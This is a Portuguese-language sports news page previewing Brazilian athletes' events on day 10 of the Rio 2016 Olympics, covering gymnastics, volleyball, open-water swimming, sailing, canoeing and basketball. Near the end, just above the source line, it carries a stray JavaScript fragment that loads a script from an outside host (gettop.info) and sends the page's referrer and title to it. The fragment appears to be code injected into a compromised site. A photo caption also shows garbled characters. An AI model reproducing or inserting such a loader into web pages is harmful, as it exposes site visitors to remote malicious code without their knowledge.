O que você não pode perder no 10º dia: Zanetti, Flavinha e jogaço no vôlei

 

Arthur Zanetti; ginástica artística; brasil; olimpíadas (Foto: Marcio Fernandes / Estadão / NOPP)
Arthur Zanetti; ginástica artística; brasil; olimpíadas (Foto: Marcio Fernandes / Estadão / NOPP)

O 10º dia da Olimpíada terá diversas competições importantes. Campeão olímpico, Arthur Zanetti disputa a final das argolas em busca do bi e Flávia Saraiva busca inédita medalha feminina. Ana Marcela e Poliana buscam o pódio nas águas abertas. e Robert Scheidt tenta ir ao pódio impossível. O vôlei masculino tem uma decisão da vaga na segunda fase contra a França. Mesmo com tantas coisas importantes para os brasileiros, os estrangeiros ficarão atrás, já que tem Simone Biles na final da trave. O Play nos Jogos, canal  do GloboEsporte.com, transmite tudo ao vivo. 

 

20/08/2014 - Nanquim (CHI)   - Jogos Ol’mpicos da Juventude Nanquim 2014 - Gin‡stica Art’stica - Flavia Saraiva ganhou a medalha de prata na prova individual geral
20/08/2014 – Nanquim (CHI) – Jogos Ol’mpicos da Juventude Nanquim 2014 – Gin‡stica Art’stica – Flavia Saraiva ganhou a medalha de prata na prova individual geral

CHANCE DE DUAS MEDALHAS NA GINÁSTICA

Depois de um domingo inesquecível, a ginástica brasileira pode voltar a brilhar nesta segunda: Arthur Zanetti, atual campeão olímpico das argolas, e Flavia Saraiva, grande nome da ginástica feminina do país na trave, tentam o pódio. As finais começam às 14h, na Arena Olímpica.Tem também Simone Biles tentando seu quarto título na competição. 

 

É AGORA OU NUNCA

A seleção masculina de vôlei tem uma missão complicadíssima na última rodada da primeira fase. O duelo contra a França, às 22h35 no Maracanãzinho, vale vaga nas quartas de final. 

 

VAI PARA ÁGUA

Ana Marcela Cunha e Poliana Okimoto estão na lista das candidatas ao pódio nas águas abertas, prova que acontece em Copacabana nesta segunda-feira, a partir das 9h30. Duas boas chances de pódio. 

 

CHANCE DE MEDALHA NO ATLETISMO

Será realizada nesta terça-feira, no Engenhão, a partir das 20h15, a final do salto com vara masculino, com a presença de Thiago Braz, quarto colocado do ranking mundial. 

 

PARA TIRAR DA CARTOLA

Robert Scheidt entra em ação às 13h, na Baia da Guanabara, para a regata da medalha da classe Laser. Ele precisa vencer sua prova e ficar cinco posições na frente de seu principal adversário na luta pelo bronze. 

 

OLHA ELE ALI

Nesta segunda-feira, começam as provas de canoagem na Lagoa Rodrigo de Freitas. A partir das9h, Isaquias disputa as eliminatórias do C1 1000m, que é sua principal prova. As semifinais são logo em seguida, às 10h30, e a final na terça-feira. 

 

BRASIL X NIGÉRIA

A seleção masculina de basquete joga contra a Nigéria por uma vaga nas quartas de final. O duelo será às 14h15, na Arena Carioca 1. Mesmo vencendo, o time não garante um lugar na próxima fase, já que precisará torcer contra a Espanha diante da Argentina (jogo será às 19h).

 

CONTRA UM CAMPEÃO OLÍMPICO

Bruno Schimidt e Alison enfrentam, nesta segunda-feira, os americanos Dalhausser, campeão olímpico em 2008, e Lucena. A partida, que será às 16h em Copacabana, vale vaga na semifinal do vôlei de praia. 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário